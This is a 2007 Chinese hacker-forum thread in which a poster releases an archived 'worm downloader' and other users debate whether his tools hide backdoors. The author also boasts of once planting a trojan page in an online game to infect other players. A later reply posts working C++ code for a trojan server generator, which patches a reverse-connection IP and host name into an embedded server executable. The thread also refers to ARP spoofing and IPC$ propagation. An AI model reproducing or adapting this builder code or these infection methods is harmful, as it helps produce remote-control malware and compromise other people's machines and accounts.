邪恶八进制信息安全团队技术讨论组 » 论坛原创{ Original Paper } » [原创]黑色技术蠕虫下载者(完整源码) [查看完整版本]

教主 2007-10-27 02:24

[原创]黑色技术蠕虫下载者(完整源码)

文章作者：教主（黑色技术 [url]www.Rootkit.com.cn[/url]）
信息来源：邪恶八进制信息安全团队（[url]www.eviloctal.com[/url]）

[attach]10726[/attach]
---------------------------------------------------------------------------
[backcolor=#FF0066]公开源码用于编程交流。利用此代码修改或传播与作者无任何关系。[/backcolor]
代码环境:Vc++  
需要Winpcap 支持
解压缩密码:fengzi

---------------淫荡的分割线-----------------------

此份代码很乱，没有太大的技术含量，高手可以飘过。。。。
--------------------------------------------------------
[color=#FF0000]顺便诅咒那些老是说我的东西有后门的家伙,木JJ。。一天到晚在说，1传10。10传100
没见过某个谁真正的指出过后门。真想不懂你们这些人,以讹传讹是不是会高潮啊？？
注：经我发现网上流传的有捆绑后门等我的工具,都是来自那些XXX修改版.[/color]

--------------------------------------------------------
各位看官嘴下留情。

blackhorse 2007-10-27 10:48

[s:289] 谁说楼主老卖10w的软件，没共享精神的，以讹传讹！

瑞星查杀WebDown.exe 文件

grayfox 2007-10-27 13:06

汗，代码还真够乱的，写这么多啊？上千行的

友情提醒一下：标题没加[原创]、截图也没放好位置，完了，教主每次发贴都免不了被扣点分[s:264]

dayang1718 2007-10-27 17:58

vc的不懂，有delphi的就好了，楼主的共享精神值得表扬！
楼主的内部论坛注册不了呀！

教主 2007-10-27 19:42

[quote]引用第8楼凋凌玫瑰于2007-10-27 15:58发表的 :
我徒弟搞了你的站，里面不少好东西，确实没后门，我作证。[/quote]

谢谢提醒。。
我知道。网站是放在美橙互连 的虚拟机。不是我的服务器。被黑很正常。。
几十个WEB在一台服务器想黑的话难度应该不大。
只要同行不是改页装B狂。拿到SHELL我也不会放在心上。

wodehao448 2007-10-28 16:21

这个是怎么回事 ？？？？？？

[img]http://bbs.syue.com/attachments/month_0702/20070224_69ada0868847d8a2b09bAIofFmLuynw6.gif[/img]
[img]http://bbs.syue.com/attachments/month_0702/20070224_bc93c5b46f6abd56dd1eIIf5y1QExZ0b.gif[/img]

飞翔star 2007-10-28 16:34

现在这个蠕虫病毒很厉害的
ajax的蠕虫病毒

教主 2007-10-28 16:55

[quote]引用第17楼wodehao448于2007-10-28 16:21发表的 :
这个是怎么回事 ？？？？？？

[img]http://bbs.syue.com/attachments/month_0702/20070224_69ada0868847d8a2b09bAIofFmLuynw6.gif[/img]
[img]http://bbs.syue.com/attachments/month_0702/20070224_bc93c5b46f6abd56dd1eIIf5y1QExZ0b.gif[/img][/quote]

我想请问你,我对外发布过这个URL吗？我也不知道谁是怎么知道我在用这个解析的。
还有 挂马不等于后门。你的明白？
这是1年前的页面了。
当时刚电视播放 武林外传。我就下了这个游戏，想当休闲娱乐玩一玩这个游戏。
但又没时间练级。所以就架设了一个马页到游戏里刷喇叭让高级的玩家中标我就不用练级了。

也就放了2天的页面。。就被到处转说我放后门。。
郁闷。。

wodehao448 2007-10-28 17:23

偶只是想问清楚这个在SYUE.com上看到的，没什么别的意思，偶还是觉得JIAOZHU很不错的，多谢发布源码！！！

教主 2007-10-29 03:47

好东西是不会放 WEB 的.只是有一些工具.放论坛里用起来方便而已了。. [s:265]

陶陶哥哥 2007-10-29 13:49

关键的ArpW.exe代码 没有.......

教主 2007-10-30 02:12

arpw.exe 就是zxarps.exe

chinafe 2007-11-5 12:24

用16进制工具打开EXE 手工找到偏移 做相应修改就可以了 没看教主的代码

不过从这句来说:
CopyMemory((LPVOID)(p + 0x7288), (LPCVOID)&modify_data,sizeof(MODIFY_DATA));//

应该是的 如果还是不太了解，你可以找一下《木马服务端生成技术详解》这个文章

54sking 2007-11-5 18:56

寻找结构体modify_data里的标示
比如字符串“123456789”，然后用16进制打开，找到123456789的所在的位置，那就是偏移量

凋凌玫瑰 2007-11-12 11:57

教主大人你啥时候发点没有后门的东西啊。。。。。改了工程名，核心代码封装在控件里，更搞不懂的你干嘛要从你的网站上要下载两个exe啊，恶汗。。。。

zzzddd 2007-12-11 18:45

[quote]引用第14楼凋凌玫瑰于2007-11-12 11:57发表的 :
教主大人你啥时候发点没有后门的东西啊。。。。。改了工程名，核心代码封装在控件里，更搞不懂的你干嘛要从你的网站上要下载两个exe啊，恶汗。。。。[/quote]

逍遥乾坤 2007-12-12 11:20

[quote]引用第14楼凋凌玫瑰于2007-11-12 11:57发表的 :
教主大人你啥时候发点没有后门的东西啊。。。。。改了工程名，核心代码封装在控件里，更搞不懂的你干嘛要从你的网站上要下载两个exe啊，恶汗。。。。[/quote]


难道这是传说中的隐藏后门么？[s:289]

fucking 2007-12-12 12:06

这个代码没多大用处的，基本学不到什么东西啊。。如玫瑰大哥所说啊，核心代码全被封装了。。。

把自己裹得严严实实的喊开源。。。。 [s:264]

lingaonbvm 2007-12-17 00:40

psexec.exe这个文件第一次运行的时候要点那个accept才能继续,所以通过ipc传播的部分并没有实现啊.

chinadu 2007-12-17 04:58

核心代码是卤猪，这个应该是OEM的 [s:264]

memory28kb 2007-12-31 23:38

实现思路很简单 用16进制工具  打开.EXE文件 找到要替换的内容地址 进行更新写入就可以了

注意点: 地址是从0开始的如下图所示的 地址应该是:0X5124

其实改写代码如下:

void ServerConfig::OnCreate()
{
  UpdateData();
  if(m_ip.IsEmpty()||m_name.IsEmpty())
{
    MessageBox("请输入反向连接的IP地址和主机上线名称 ");
  }

  DWORD dwSize,dwWritten;
  HRSRC hr=FindResource(0,MAKEINTRESOURCE(IDR_SERVER),"SERVER");//查找资源
  if(hr==NULL) MessageBox("hr error");

  dwSize=SizeofResource(NULL,hr);

  HGLOBAL hg=LoadResource(NULL,hr);//加载资源

  if(hg==NULL) MessageBox("hg error");

  LPSTR lp=(LPSTR)LockResource(hg);//锁定资源

  if(lp==NULL) MessageBox("lp error");


  LPBYTE p=(LPBYTE)GlobalAlloc(GPTR, dwSize);
  if (p==NULL) MessageBox("lp error");
  
  CopyMemory((LPVOID)p, (LPCVOID)LockResource(hg), dwSize);                  // 复制资源数据
  CopyMemory((LPVOID)(p+0x5020), (LPCVOID)m_name.LockBuffer(),MAX_PATH);      //写入主机名称信息
  CopyMemory((LPVOID)(p+0x5124), (LPCVOID)m_ip.LockBuffer(),15);  //写入主机名称信息

  /**//*本地文件路径*/

  CString SaveFilePath;
  BROWSEINFO bi;
  ZeroMemory(&bi,sizeof(BROWSEINFO));
  bi.hwndOwner=GetSafeHwnd();
  bi.lpszTitle="将文件保存到";
  LPITEMIDLIST idl=SHBrowseForFolder(&bi);
  if(idl==NULL)
    return;
  SHGetPathFromIDList(idl,SaveFilePath.LockBuffer());

  strcat(SaveFilePath.LockBuffer(),"\");
  strcat(SaveFilePath.LockBuffer(),"BabyServer.exe");



  HANDLE hFile;
  hFile = CreateFile(SaveFilePath.LockBuffer(),GENERIC_WRITE,0,NULL,Create_ALWAYS,0,NULL);//创建文件
  if(hFile == NULL)  MessageBox("file error");
  else        MessageBox("服务端文件生成成功!");
  WriteFile(hFile,(LPCVOID)p,dwSize,&dwWritten,NULL);//写入文件
  CloseHandle(hFile);

  
}




IDC_SERVER为引入的SERVER.EXE资源文件 SERVER为 资源类类型


Trackback: [url]http://tb.blog.csdn.net/TrackBack.aspx?PostId=1868207[/url]

jinkouchunan 2008-2-13 22:36

我记得zxarps是开源的吧？？

谁把代码发一份给我

vxk 2008-2-16 18:14

空壳一样的代码，豪无美感的代码罗列，bug连连和文件合并式感染，一点实质作用都没有的ipc$传播，

教主果然是教主，连开源也是如此"jiao zhu"

查看完整版本: [原创]黑色技术蠕虫下载者(完整源码)

© 1999-2008 EvilOctal Security Team